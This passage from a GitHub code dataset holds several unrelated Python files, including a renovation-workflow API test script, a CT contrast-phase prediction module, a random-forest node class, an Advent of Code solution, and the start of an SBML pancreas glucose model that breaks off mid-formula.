\"TOILET\",\n \"imgs\": [{\n \"url\": get_conf('img', 'url'),\n \"img_id\": get_conf('img', 'img_id'),\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 0,\n \"type\": \"TOILET\"\n }]\n }, {\n \"attach_type\": \"KITCHEN\",\n \"imgs\": [{\n \"url\": get_conf('img', 'url'),\n \"img_id\": get_conf('img', 'img_id'),\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 1,\n \"type\": \"KITCHEN\"\n }]\n }, {\n \"attach_type\": \"LIVING_ROOM\",\n \"imgs\": [{\n \"url\": get_conf('img', 'url'),\n \"img_id\": get_conf('img', 'img_id'),\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 2,\n \"type\": \"LIVING_ROOM\"\n }]\n }, {\n \"attach_type\": \"ROOM\",\n \"imgs\": [{\n \"url\": get_conf('img', 'url'),\n \"img_id\": get_conf('img', 'img_id'),\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 3,\n \"type\": \"ROOM\"\n }]\n }, {\n \"attach_type\": \"OTHER\",\n \"imgs\": [{\n \"url\": get_conf('img', 'url'),\n \"img_id\": get_conf('img', 'img_id'),\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 4,\n \"type\": \"OTHER\"\n }]\n }],\n \"check_remark\": \"\",\n \"closed_water_test_result\": None,\n \"curOneLevelNode\": None,\n \"curTwoLevelNode\": None,\n \"door_card\": None,\n \"door_key\": None,\n \"electricity_card\": None,\n \"electricity_meter_num\": None,\n \"electricity_meter_remain\": None,\n \"gas_card\": None,\n \"gas_meter_num\": None,\n \"gas_meter_remain\": None,\n \"grade\": None,\n \"hidden_check_date\": None,\n \"stuff_check_date\": '%s 09:00:00' % addDays(1),\n \"landlordGoods\": None,\n \"project_id\": self.project_id,\n \"reform_way_fact\": None,\n \"reform_way_fact_name\": \"\",\n \"remark\": None,\n \"score_remark\": None,\n \"water_card\": None,\n \"water_card_remain\": None,\n \"water_meter_num\": None\n }\n for attachment in data['attachments']:\n IMG = upLoadPhoto(url=self.uploadPhotoURL, filename='%s.png' % attachment['attach_type'])\n attachment['imgs'][0]['url'] = IMG.url\n attachment['imgs'][0]['img_id'] = IMG.id\n result = myRequest(url, data)\n if result:\n consoleLog(u'硬装验收完成')\n return\n\n hideCheck()\n stufCheck()\n\n def projectCheck(self):\n \"\"\"项目验收\"\"\"\n\n def wholeCheck():\n \"\"\"整体验收\"\"\"\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationProjectController/proCheck/wholeCheck'\n IMG_CARDS = upLoadPhoto(url=self.uploadPhotoURL, filename='CARDS.png')\n IMG_THREE = upLoadPhoto(url=self.uploadPhotoURL, filename='THREE.png')\n data = {\n \"air_switch\": None,\n \"attachments\": None,\n \"card_attachs\": [{\n \"attach_type\": \"CARDS\",\n \"imgs\": [{\n \"url\": IMG_CARDS.url,\n \"img_id\": IMG_CARDS.id,\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 0,\n \"type\": \"\"\n }]\n }],\n \"closed_water_test_result\": None,\n \"curOneLevelNode\": None,\n \"curTwoLevelNode\": None,\n \"door_card\": None,\n \"door_key\": None,\n \"electricity_card\": None,\n \"electricity_meter_num\": None,\n \"electricity_meter_remain\": None,\n \"gas_card\": None,\n \"gas_meter_num\": None,\n \"gas_meter_remain\": None,\n \"grade\": None,\n \"landlordGoods\": None,\n \"newStuffList\": None,\n \"overall_check_date\": '%s 10:00:00' % addDays(1),\n \"project_id\": self.project_id,\n \"remark\": \"\",\n \"score_remark\": None,\n \"three_attachs\": [{\n \"attach_type\": \"THREE\",\n \"imgs\": [{\n \"url\": IMG_THREE.url,\n \"img_id\": IMG_THREE.id,\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 0,\n \"type\": \"\"\n }]\n }],\n \"water_card\": None,\n \"water_card_remain\": None,\n \"water_meter_num\": None\n }\n result = myRequest(url, data)\n if result:\n # consoleLog(u'整体验收完成')\n return\n\n def profee():\n \"\"\"物业交割\"\"\"\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationProjectController/proCheck/profee'\n IMG = upLoadPhoto(url=self.uploadPhotoURL, filename='PROPERTY_DELIVERY_ORDER.png')\n data = {\n \"air_switch\": \"\",\n \"door_card\": \"\",\n \"door_key\": \"\",\n \"electricity_card\": \"\",\n \"electricity_meter_num\": \"\",\n \"electricity_meter_remain\": \"\",\n \"gas_card\": \"\",\n \"gas_meter_num\": \"\",\n \"gas_meter_remain\": \"\",\n \"project_id\": self.project_id,\n \"water_card\": \"\",\n \"water_card_remain\": \"\",\n \"water_meter_num\": \"\",\n \"attachments\": [{\n \"attach_type\": \"PROPERTY_DELIVERY_ORDER\",\n \"imgs\": [{\n \"url\": IMG.url,\n \"img_id\": IMG.id,\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 0,\n \"type\": \"\"\n }]\n }],\n \"resource\": \"PROJECT_CHECK\"\n }\n result = myRequest(url, data)\n if result:\n # consoleLog(u'物业交割完成')\n return\n\n def costSettle():\n \"\"\"费用结算\"\"\"\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationProjectController/proCheck/costsettle'\n data = {\n \"project_id\": self.project_id,\n \"remark\": \"\"\n }\n result = myRequest(url, data)\n if result:\n # consoleLog(u'费用结算完成')\n return\n\n wholeCheck()\n profee()\n costSettle()\n\n def indoorImg(self):\n \"\"\"室内图\"\"\"\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationProjectController/proComp/indoor'\n IMG_LAYOUT = upLoadPhoto(url=self.uploadPhotoURL, filename='LAYOUT.png')\n data = {\n \"curOneLevelNode\": None,\n \"curTwoLevelNode\": None,\n \"deliver_room_date\": None,\n \"house_attachs\": [{\n \"attach_type\": \"PUBLIC_TOILET_1\",\n \"imgs\": [{\n \"url\": None,\n \"img_id\": None,\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 0,\n \"type\": \"PUBLIC_TOILET_1\"\n }]\n }, {\n \"attach_type\": \"KITCHEN_1\",\n \"imgs\": [{\n \"url\": None,\n \"img_id\": None,\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 1,\n \"type\": \"KITCHEN_1\"\n }]\n }, {\n \"attach_type\": \"PARLOUR_1\",\n \"imgs\": [{\n \"url\": None,\n \"img_id\": None,\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 2,\n \"type\": \"PARLOUR_1\"\n }]\n }, {\n \"attach_type\": \"METH\",\n \"imgs\": [{\n \"url\": None,\n \"img_id\": None,\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 3,\n \"type\": \"METH\"\n }]\n }, {\n \"attach_type\": \"ETH\",\n \"imgs\": [{\n \"url\": None,\n \"img_id\": None,\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 4,\n \"type\": \"ETH\"\n }]\n }, {\n \"attach_type\": \"PROP\",\n \"imgs\": [{\n \"url\": None,\n \"img_id\": None,\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 5,\n \"type\": \"PROP\"\n }]\n }, {\n \"attach_type\": \"BALCONY_1\",\n \"imgs\": [{\n \"url\": None,\n \"img_id\": None,\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 6,\n \"type\": \"BALCONY_1\"\n }]\n }, {\n \"attach_type\": \"BALCONY_2\",\n \"imgs\": [{\n \"url\": None,\n \"img_id\": None,\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 7,\n \"type\": \"BALCONY_2\"\n }]\n }],\n \"layout_attachs\": [{\n \"attach_type\": \"LAYOUT\",\n \"imgs\": [{\n \"url\": IMG_LAYOUT.url,\n \"img_id\": IMG_LAYOUT.id,\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 0,\n \"type\": \"\"\n }]\n }],\n \"project_id\": self.project_id,\n \"remark\": None\n }\n for house_attach in data['house_attachs']:\n IMG = upLoadPhoto(url=self.uploadPhotoURL, filename='%s.png' % house_attach['attach_type'])\n house_attach['imgs'][0]['url'] = IMG.url\n house_attach['imgs'][0]['img_id'] = IMG.id\n result = myRequest(url, data)\n if result:\n # consoleLog(u'室内图添加完成')\n return\n\n def delivery(self):\n \"\"\"交房\"\"\"\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationProjectController/proComp/delivery'\n data = {\n \"deliver_room_date\": '%s 10:00:00' % addDays(1),\n \"project_id\": self.project_id,\n \"remark\": \"\"\n }\n result = myRequest(url, data)\n if result:\n consoleLog(u'竣工完成')\n return\n\n def fitment(self):\n \"\"\"整个装修流程\"\"\"\n self.placeOrder() # 下单\n self.dispatchOrder() # 派单\n self.acceptOrder() # 接单\n self.survey() # 勘测\n self.projectOrder() # 项目计划\n self.configList() # 物品清单\n self.stuffList() # 装修清单\n self.hideAndStufCheck() # 施工中\n self.projectCheck() # 项目验收\n self.indoorImg() # 室内图\n self.delivery() # 竣工\n","repo_name":"bestwfl/isz","sub_path":"isz/decoration_new.py","file_name":"decoration_new.py","file_ext":"py","file_size_in_byte":56374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20306600570","text":"from sys import argv\nimport os\nfrom PIL import Image, ImageFont, ImageDraw, ImageColor\n\noutput_dimensions = (1612, 640)\nfont_size = 78\npadding = {\"top\": -14, \"right\": 3, \"bottom\": 5}\noutput_dir = os.path.join(os.getcwd(), \"output\")\n\nif os.path.isfile(output_dir):\n raise Exception(\"Specified output directory is a file\")\nelif not os.path.isdir(output_dir):\n os.mkdir(output_dir)\n\ntry:\n arg = argv[1]\nexcept IndexError as e:\n raise Exception(\"No hexcode argument received\")\n\ntry:\n int(arg, base=16)\nexcept ValueError:\n raise Exception(\"Only accepts hex digits for the colour code\")\n\noriginal_code = arg.upper()\n\nif len(arg) == 3:\n hex_list = map(lambda d: d * 2, arg)\n hexcode = \"#\" + \"\".join(hex_list)\nelif len(arg) == 6:\n hexcode = \"#\" + arg.upper()\nelse:\n raise Exception(\"Colour has to be either 3 or 6 hex digits long\")\n\nimage = Image.new(\"RGB\", output_dimensions, color=ImageColor.getrgb(hexcode))\n\nfont = ImageFont.truetype(\"NotoSans-CondensedBold.ttf\", font_size)\ndraw = ImageDraw.Draw(image)\n\nhex_str = \"#\" + original_code\nhexcode_text_size = font.getsize(hex_str)\n\ndraw.rectangle(\n (\n (0, output_dimensions[1] - hexcode_text_size[1] - padding[\"top\"]),\n (output_dimensions[0], output_dimensions[1]),\n ),\n fill=(255, 255, 255),\n)\n\ndraw.text(\n (\n output_dimensions[0] - hexcode_text_size[0] - padding[\"right\"],\n output_dimensions[1] - hexcode_text_size[1] - padding[\"bottom\"],\n ),\n hex_str,\n font=font,\n fill=0,\n)\n\nimage.save(os.path.join(output_dir, f\"{hex_str[1:]}.png\"))\n","repo_name":"eniallator/hexcode-to-mug","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41362123653","text":"import logging\nimport subprocess\nimport time\nfrom pathlib import Path\nfrom typing import Any, Dict, Optional, Union\n\nfrom boa_contrast.features import FeatureBuilder\nfrom boa_contrast.ml import ContrastRecognition\n\nlogger = logging.getLogger(__name__)\n\n\ndef predict(\n ct_path: Union[Path, str],\n segmentation_folder: Union[Path, str],\n phase_model_name: str = \"real_IV_class_HistGradientBoostingClassifier_5class_2023-07-20\",\n git_model_name: str = \"KM_in_GI_HistGradientBoostingClassifier_2class_2023-07-18\",\n one_mask_per_file: bool = True,\n store_custom_regions: bool = False,\n total_segmentation_name: str = \"total.nii.gz\",\n label_map: Optional[Dict[str, Any]] = None,\n) -> Optional[Dict[str, Any]]:\n # Download data for model\n ct_path = Path(ct_path)\n logger.info(\"Computing the features...\")\n start = time.time()\n fb = FeatureBuilder(\n dataset_id=\"inference\",\n one_mask_per_file=one_mask_per_file,\n store_custom_regions=store_custom_regions,\n total_segmentation_name=total_segmentation_name,\n label_map=label_map,\n )\n sample = fb.compute_features(\n ct_data_path=ct_path,\n segmentation_path=Path(segmentation_folder),\n )\n logger.info(f\"Features computed in {time.time() - start:0.5f}s\")\n if sample is None:\n logger.warning(\"The segmentation does not exist.\")\n return None\n\n logger.info(\"Computing the contrast phase prediction...\")\n\n pr_phase = ContrastRecognition(task=\"iv_phase\", model_name=phase_model_name)\n start = time.time()\n pr_output = list(pr_phase.predict_batch([sample]))[0]\n logger.info(f\"Phase prediction computed in {time.time() - start:0.5f}s\")\n\n logger.info(\"Computing the GIT contrast prediction...\")\n gitr = ContrastRecognition(task=\"git\", model_name=git_model_name)\n\n start = time.time()\n gitr_output = list(gitr.predict_batch([sample]))[0]\n logger.info(f\"GIT prediction computed in {time.time() - start:0.5f}s\")\n\n return dict(\n **{\"phase_\" + key: value for key, value in pr_output.items()},\n **{\"git_\" + key: value for key, value in gitr_output.items()},\n )\n\n\ndef compute_segmentation(\n ct_path: Path,\n segmentation_folder: Union[Path, str],\n device_id: Optional[int],\n user_id: Optional[str],\n compute_with_docker: bool,\n) -> Path:\n segmentation_folder = Path(segmentation_folder)\n example_output = segmentation_folder / \"liver.nii.gz\"\n vessels_output = segmentation_folder / \"liver_vessels.nii.gz\"\n tasks = []\n if example_output.exists():\n logger.info(\"The full body segmentation exists and will not be recomputed.\")\n else:\n tasks = [\"total\"]\n\n if vessels_output.exists():\n logger.info(\"The liver vessels segmentation exists and will not be recomputed.\")\n else:\n tasks.append(\"liver_vessels\")\n\n if example_output.exists() and vessels_output.exists():\n return segmentation_folder\n\n logger.info(\"Segmentation is being computed\")\n # TODO: Make the crop region liver findable by the totalsegmentator if multilabel is true\n if compute_with_docker:\n logger.info(\"Using docker.\")\n # TODO: Set the docker image to something more stable\n for task in tasks:\n logger.info(f\"Computing segmentation for task {task}\")\n command = (\n \"docker run \"\n + (f\"--user {user_id}:{user_id} \" if user_id is not None else \"\")\n + \"--rm \"\n + (f\"--gpus device={device_id} \" if device_id is not None else \"\")\n + \"--ipc=host \"\n f\"-v {ct_path.absolute()}:/image.nii.gz \"\n f\"-v {segmentation_folder.absolute()}:/output \"\n \"wasserth/totalsegmentator_container:master \"\n f\"TotalSegmentator -i /image.nii.gz -o /output -ta {task}\"\n )\n start = time.time()\n subprocess.run(\n command.split(\" \"),\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n shell=False,\n check=True,\n universal_newlines=True,\n )\n logger.info(\n f\"Segmentation computed for {task} in {time.time() - start:0.5f}s\"\n )\n else:\n logger.info(\"Using the TotalSegmentator package.\")\n\n from totalsegmentator.python_api import totalsegmentator\n\n for task in tasks:\n logger.info(f\"Computing segmentation for task {task}\")\n start = time.time()\n totalsegmentator(\n input=ct_path,\n output=segmentation_folder,\n task=task,\n ml=False,\n preview=False,\n force_split=False,\n nora_tag=\"None\",\n quiet=False,\n verbose=0,\n test=0,\n crop_path=None,\n )\n logger.info(\n f\"Segmentation computed for {task} in {time.time() - start:0.5f}s\"\n )\n\n return segmentation_folder\n","repo_name":"UMEssen/BOA-Contrast","sub_path":"boa_contrast/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":5078,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"8252048754","text":"#! /usr/bin/python\n\"\"\"\nCondense all the csv files into a single table with one row per object\n\"\"\"\nimport pandas as pd\nfrom pathlib import Path\n\n\nINPUT_DIR = Path(\n \"/home/jorge/Documents/data/CASU_411/tables/ascii_tables_no-tiled/output_dephase/\"\n)\nOUTPUT_DIR = Path(\n \"/home/jorge/Documents/data/CASU_411/tables/ascii_tables_no-tiled/agg/\"\n)\n\nfixed_columns = [\n \"GaiaDR2\",\n \"Gmag\",\n \"RA_ICRS\",\n \"DE_ICRS\",\n \"pmRA\",\n \"pmDE\",\n \"SOStype\",\n \"VCtype\",\n \"PS1type\",\n \"period\",\n]\ncols_to_group = [\"filter\", \"mag\"]\n\nrows = []\n\nfor file in INPUT_DIR.glob(\"*.csv\"):\n print(file)\n df = pd.read_csv(file)\n sfix = df[fixed_columns].iloc[0]\n smean = df[cols_to_group].groupby(\"filter\").mean().T.iloc[0]\n\n row = pd.concat([sfix, smean], axis=0)\n rows.append(row)\n\n\ndf = pd.DataFrame(rows)\nprint(df)\n\n\n# Save to file\nif not OUTPUT_DIR.exists():\n OUTPUT_DIR.mkdir(parents=True)\n\ndf.to_csv(OUTPUT_DIR / \"agg_values_RRLyrae.csv\", index=False)\n","repo_name":"jorgeanais/lightcurvex","sub_path":"tools/agg_output_dephase_objects.py","file_name":"agg_output_dephase_objects.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71972256052","text":"import random\nimport operator\nimport numpy as np\nimport pandas as pd\n\nfrom scipy import stats\n\nclass Node:\n def __init__(self, X, y, feats, metric='gini'):\n self.leaf = True\n self.X = X\n self.y = y\n self.features = feats\n self.criteria = None\n self.value = None\n self.max_val = (stats.mode(y)[0][0])\n self.is_cat = False\n self.values = self.get_values()\n self.samples = y.shape[0]\n self.metric = metric\n self.impurity = self.calc_criterion()\n self.left = None\n self.right = None\n self.tried = False\n\n def _gini(self, p):\n return(p*(1-p) + (1-p)*(1-(1-p)))\n\n def _entropy(self, p):\n return(-p*np.log2(p) - (1-p)*np.log2(1-p))\n\n def _error(self, p):\n return(1-np.max([p, 1-p]))\n\n def info_gain(self, left, right):\n return(self.impurity - \\\n (left.samples*left.impurity/self.samples) - \\\n (right.samples*right.impurity/self.samples))\n\n def print_node(self):\n if(self.leaf):\n print('Leaf node,', end=' ')\n else:\n print(self.criteria, end=' ')\n if(self.is_cat):\n print(\"== \" + str(self.value), end=' ')\n else:\n print(\"<= \" + str(self.value), end=' ')\n print(\", size: \" + str(self.samples) + ', imp: '+ str(self.calc_criterion()) + ', vals: ', self.values)\n\n def calc_criterion(self):\n method = getattr(self, '_'+self.metric)\n val = (sum([method(self.values[x]/self.samples) for x in self.values]))\n return(val)\n # return(sum([method(x/self.samples) for x in self.values]))\n\n def get_values(self):\n vals, counts = np.unique(self.y, return_counts=True)\n return(dict(zip(vals, counts)))\n # return(self.y.iloc[:,0].value_counts(sort=False).tolist())\n\n def best_class(self, root):\n temp = {}\n for key in self.values:\n temp[key] = self.values[key]/root.values[key]\n return(max(temp.items(), key=operator.itemgetter(1))[0])\n\n def split_node(self, min_sam, num_splits):\n max_info_gain = 0\n self.tried = True\n is_cat = (self.X.dtype == 'object')\n values = []\n if(is_cat):\n for i in range(self.X.shape[1]):\n temp_arr = (np.stack((self.X[:,i], self.y), axis=-1))\n vals = list(set(self.X[:,i]))\n if(len(vals) == 1):\n continue\n elif(len(vals) == 2):\n values.append((i, vals[1]))\n else:\n for x in vals:\n values.append((i, x))\n # print(values)\n # print()\n # print(\"Calculating splits...\")\n for i, val in values:\n X_left = self.X[self.X[:,i] == val]\n y_left = self.y[self.X[:,i] == val]\n X_right = self.X[self.X[:,i] != val]\n y_right = self.y[self.X[:,i] != val]\n if(X_left.shape[0] >= min_sam and X_right.shape[0] >= min_sam):\n temp_left = Node(X_left, y_left, self.features)\n temp_right = Node(X_right, y_right, self.features)\n else:\n continue\n # print(self.features[i] + \"==\" + str(val) + \" Info gain: \"+ str(self.info_gain(temp_left, temp_right)))\n if(self.info_gain(temp_left, temp_right) > max_info_gain):\n self.is_cat = True\n max_info_gain = self.info_gain(temp_left, temp_right)\n # print(self.features[i], val,max_info_gain)\n self.left = temp_left\n self.right = temp_right\n self.criteria = self.features[i]\n self.value = val\n else:\n values = []\n for i in range(self.X.shape[1]):\n vals = self.X[:,i]\n if(len(vals)>num_splits):\n temp_vals = random.sample(list(vals), k=num_splits)\n for x in temp_vals:\n values.append((i, x))\n else:\n for x in vals:\n values.append((i, x))\n for i, val in set(values):\n X_left = self.X[self.X[:,i] <= val]\n y_left = self.y[self.X[:,i] <= val]\n X_right = self.X[self.X[:,i] > val]\n y_right = self.y[self.X[:,i] > val]\n if(X_left.shape[0] >= min_sam and X_right.shape[0] >= min_sam):\n temp_left = Node(X_left, y_left, self.features)\n temp_right = Node(X_right, y_right, self.features)\n else:\n continue\n # print(self.features[i] + \"<=\" + str(val) + \" Info gain: \"+ str(self.info_gain(temp_left, temp_right)))\n if(self.info_gain(temp_left, temp_right) > max_info_gain):\n self.is_cat = False\n max_info_gain = self.info_gain(temp_left, temp_right)\n self.left = temp_left\n self.right = temp_right\n self.criteria = self.features[i]\n self.value = val\n if(self.criteria is not None):\n self.leaf = False\n self.X = None\n self.y = None\n","repo_name":"astronights/RandomForest_from_Scratch","sub_path":"rf_node.py","file_name":"rf_node.py","file_ext":"py","file_size_in_byte":5379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24419914630","text":"\"\"\"\n# Assignments - 3\n# Clean the Messy salary into integers for Data Processing\nsalary = '$876,001' \n\nHint:\n Remove the $\n Remove the ,\n Convert into integer\n\"\"\"\n\nsalary = '$876,001' \ns1=salary.replace('$','')\nlist1=s1.split(',')\ns=''.join(list1)\nsal=int(salary.replace(',', '').replace('$', ''))\nprint(sal)","repo_name":"sachinbhatiskb/python-training","sub_path":"salary string to int.py","file_name":"salary string to int.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38493620637","text":"import itertools\nimport operator\nfrom functools import reduce\n\nimport common.input_data as input_data\n\ndef get_first_bus_after_timestamp(timestamp: str, bus_ids: str) -> int:\n busses = [int(bus) for bus in bus_ids.split(\",\") if bus != 'x']\n for num in itertools.count(int(timestamp)):\n for bus in busses:\n if num % bus == 0:\n return bus * (num - int(timestamp))\n\n raise RuntimeError(\"Should not reach this code\")\n\n# from Cormen's Introduction to Algorithms\ndef extended_euclid(a: int, b: int)-> tuple[int, int, int]: # disable=C0103\n if b == 0:\n return (a, 1, 0)\n\n d, x_prime, y_prime = extended_euclid(b, a % b) # disable=C0103\n return d, y_prime, x_prime - (a // b)* y_prime\n\ndef inverse_mod(a: int, n: int) -> int: # disable=C0103\n _d,x,_y = extended_euclid(a, n) # disable=C0103\n return x\n\ndef find_timestamp_for_consecutive_busses(bus_ids: str) -> int:\n busses = [(index, int(bus)) for index, bus in enumerate(bus_ids.split(\",\")) if bus != 'x']\n modulus = reduce(operator.mul, [bus for index, bus in busses])\n value = sum((bus - index) * modulus//bus * inverse_mod(modulus//bus, bus)\n for index, bus in busses)\n return value % modulus\n\n\nBUS_DATA: list[str] = input_data.read(\"input/input13.txt\")\nTIMESTAMP, BUS_IDS = BUS_DATA\n\nif __name__ == \"__main__\":\n print(f\"First bus: {get_first_bus_after_timestamp(TIMESTAMP, BUS_IDS)}\")\n\n print(\"Timestamp with consecutive busses: \"\n f\"{find_timestamp_for_consecutive_busses(BUS_IDS)}\")\n","repo_name":"pviafore/AdventOfCode2020","sub_path":"challenge13.py","file_name":"challenge13.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10596572138","text":"from pathlib import Path\n\nfrom sbmlutils.factory import *\nfrom sbmlutils.metadata import *\nfrom sbmlutils.examples.templates import terms_of_use\nfrom sbmlutils.cytoscape import visualize_sbml\n\nfrom panmin.model import annotations\n\nclass U(Units):\n \"\"\"UnitDefinitions.\"\"\"\n\n min = UnitDefinition(\"min\", \"min\")\n s = UnitDefinition(\"s\", \"s\")\n kg = UnitDefinition(\"kg\", \"kg\")\n m2 = UnitDefinition(\"m2\", \"meter^2\")\n mg = UnitDefinition(\"mg\", \"mg\")\n ml = UnitDefinition(\"ml\", \"ml\")\n mmole = UnitDefinition(\"mmole\", \"mmole\")\n per_min = UnitDefinition(\"per_min\", \"1/min\")\n mM = UnitDefinition(\"mM\", \"mmole/liter\")\n mmole_per_min = UnitDefinition(\"mmole_per_min\", \"mmole/min\")\n mmole_per_minl = UnitDefinition(\"mmole_per_minl\", \"mmole/min/l\")\n\n\n# -----------------------------------------------------------------------------\n# Pancreas Metabolism\n# -----------------------------------------------------------------------------\nmid = \"pancreas_min\"\nversion = 3\n\n_m = Model(\n sid=f\"{mid}_{version}\",\n name=f\"Pancreas minimal glucose model version {version}\",\n notes=\"\"\"\n # Pancreas minimal glucose model.\n \"\"\"\n + terms_of_use,\n units=U,\n model_units=ModelUnits(\n time=U.min,\n extent=U.mmole,\n substance=U.mmole,\n length=U.meter,\n area=U.m2,\n volume=U.liter,\n ),\n creators=[\n Creator(\n familyName=\"Koenig\",\n givenName=\"Matthias\",\n email=\"koenigmx@hu-berlin.de\",\n organization=\"Humboldt-University Berlin, Institute for Theoretical Biology\",\n site=\"https://livermetabolism.com\",\n ),\n ],\n)\n\n\n# volume for model (FIXME: scale to beta-cell)\npancreas_volume = 0.5 # [L]\nspecies_in_amounts = False\n\n_m.compartments = [\n Compartment(\n \"Vpa\",\n value=pancreas_volume,\n unit=U.liter,\n constant=True,\n name=\"pancreas tissue\",\n sboTerm=SBO.PHYSICAL_COMPARTMENT,\n port=True,\n annotations=annotations.compartments[\"pa\"],\n ),\n Compartment(\n \"Vext\", value=5.0, unit=U.liter, constant=True, name=\"pancreas blood\", port=True,\n sboTerm=SBO.PHYSICAL_COMPARTMENT,\n annotations=annotations.compartments[\"blood\"],\n ),\n Compartment(\n \"Vmem\",\n value=1.0,\n unit=U.m2,\n constant=True,\n name=\"pancreas plasma membrane\",\n sboTerm=SBO.PHYSICAL_COMPARTMENT,\n annotations=annotations.compartments[\"plasma membrane\"],\n ),\n]\n\n_m.species = [\n Species(\n \"Aext_glc\",\n compartment=\"Vext\",\n initialConcentration=5.0,\n substanceUnit=U.mmole,\n name=\"glucose\",\n hasOnlySubstanceUnits=True,\n sboTerm=SBO.SIMPLE_CHEMICAL,\n port=True,\n boundaryCondition=True,\n annotations=annotations.species[\"glc\"],\n ),\n Species(\n \"Aext_lac\",\n compartment=\"Vext\",\n initialConcentration=0.8,\n substanceUnit=U.mmole,\n name=\"lactate\",\n hasOnlySubstanceUnits=True,\n sboTerm=SBO.SIMPLE_CHEMICAL,\n port=True,\n annotations=annotations.species[\"lac\"],\n ),\n Species(\n \"Aext_ins\",\n compartment=\"Vext\",\n initialConcentration=60e-9,\n substanceUnit=U.mmole,\n name=\"insulin\",\n hasOnlySubstanceUnits=True,\n sboTerm=SBO.MACROMOLECULE,\n port=True,\n annotations=annotations.species[\"ins\"],\n ),\n Species(\n \"Aext_cpep\",\n compartment=\"Vext\",\n initialConcentration=0,\n substanceUnit=U.mmole,\n name=\"c-peptide\",\n hasOnlySubstanceUnits=True,\n sboTerm=SBO.MACROMOLECULE,\n port=True,\n annotations=annotations.species[\"cpep\"],\n ),\n Species(\n \"Apa_glc\",\n compartment=\"Vpa\",\n initialConcentration=5.0,\n substanceUnit=U.mmole,\n name=\"glucose\",\n sboTerm=SBO.SIMPLE_CHEMICAL,\n hasOnlySubstanceUnits=True,\n annotations=annotations.species[\"glc\"],\n ),\n Species(\n \"Apa_lac\",\n compartment=\"Vpa\",\n initialConcentration=0.8,\n substanceUnit=U.mmole,\n name=\"lactate\",\n sboTerm=SBO.SIMPLE_CHEMICAL,\n hasOnlySubstanceUnits=True,\n annotations=annotations.species[\"lac\"],\n ),\n]\n\nrules = []\nif species_in_amounts:\n # concentration rules\n for s in _m.species:\n rules.append(\n AssignmentRule(\n f\"C{s.sid[1:]}\",\n f\"{s.sid}/{s.compartment}\",\n U.mM,\n name=f\"{s.name} concentration ({s.compartment})\",\n ),\n )\n\n_m.reactions = [\n Reaction(\n sid=\"GLCIM\",\n name=\"glucose import\",\n equation=\"Aext_glc <-> Apa_glc\" if species_in_amounts else \"Cext_glc <-> Cpa_glc\",\n compartment=\"Vmem\",\n sboTerm=SBO.TRANSPORT_REACTION,\n pars=[\n Parameter(\"GLCIM_Vmax\", 100.0, U.mmole_per_minl,\n name=\"Vmax glucose import\", sboTerm=SBO.MAXIMAL_VELOCITY),\n Parameter(\"GLCIM_Km\", 1.0, U.mM,\n name=\"Km glucose import\", sboTerm=SBO.MICHAELIS_CONSTANT\n ),\n ],\n rules=[],\n formula=(\n \"Vpa * GLCIM_Vmax/GLCIM_Km * (Cext_glc-Cpa_glc)/(1 dimensionless + Cext_glc/GLCIM_Km + Cpa_glc/GLCIM_Km)\",\n U.mmole_per_min,\n ),\n ),\n Reaction(\n sid=\"LACEX\",\n name=\"lactate export\",\n equation=\"Apa_lac <-> Aext_lac\"\n if species_in_amounts\n else \"Cpa_lac <-> Cext_lac\",\n compartment=\"Vmem\",\n sboTerm=SBO.TRANSPORT_REACTION,\n pars=[\n Parameter(\"LACEX_Vmax\", 100.0, U.mmole_per_minl, name=\"Vmax lactate export\",\n sboTerm=SBO.MAXIMAL_VELOCITY),\n Parameter(\"LACEX_Km\", 0.5, U.mM,\n name=\"Km lactate export\", sboTerm=SBO.MICHAELIS_CONSTANT),\n ],\n rules=[],\n formula=(\n \"Vpa * LACEX_Vmax/LACEX_Km * 